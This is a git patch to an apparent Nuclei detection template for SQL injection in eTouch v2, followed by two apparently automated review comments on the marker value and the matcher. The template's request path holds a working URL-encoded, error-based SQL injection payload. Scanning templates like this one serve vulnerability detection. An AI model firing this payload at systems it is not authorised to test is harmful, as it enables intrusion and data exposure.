From 9ecfdf9a0ad173ac973b177c26d4b99bb1d1481e Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Thu, 30 Jun 2022 08:35:53 +0530
Subject: [PATCH] Update etouch-v2-sqli.yaml
---
 vulnerabilities/other/etouch-v2-sqli.yaml | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)
diff --git a/vulnerabilities/other/etouch-v2-sqli.yaml b/vulnerabilities/other/etouch-v2-sqli.yaml
index 4983e47bcb..93efc456c6 100644
--- a/vulnerabilities/other/etouch-v2-sqli.yaml
+++ b/vulnerabilities/other/etouch-v2-sqli.yaml
@@ -9,10 +9,13 @@ info:
 - https://www.anquanke.com/post/id/168991
 tags: etouch,sqli
+variables:
+ num: "999999999"
+
 requests:
 - method: GET
 path:
- "{{BaseURL}}/upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)''"
+ - "{{BaseURL}}/upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5({{num}}),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)''"
 matchers-condition: and
 matchers:
@@ -22,5 +25,5 @@ requests:
 - type: word
 words:
- "c4ca4238a0b923820dcc509a6f75849b"
+ - '{{md5({{num}})}}'
 part: body
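Review bot: `num` in the new `variables:` block is a fixed literal, so the digest the matcher expects is identical on every scan and every target. A per-run value such as `num: "{{rand_int(800000, 999999)}}"` would make a response that merely happens to contain a known string less likely to match, provided the engine evaluates the variable once and reuses it in both the path and the matcher. A short comment above it, e.g. `# marker hashed server-side and compared by the body word matcher`, would explain why the value exists. The matchers that consume it begin below this hunk.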
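Review bot: The word matcher accepts the bare digest anywhere in the body, although the request in the first hunk wraps it in `0x7e` delimiters. Matching `'~{{md5({{num}})}}~'` would tie a hit to the output of the injected expression rather than to any occurrence of the hash, assuming the application returns the database error text unmodified. The new entry is also single-quoted while the path entry uses double quotes, and one quoting style per file reads better. The first matcher under `matchers:` lies between the two hunks and is not visible here, so how strict the combined `and` condition is cannot be judged from this diff.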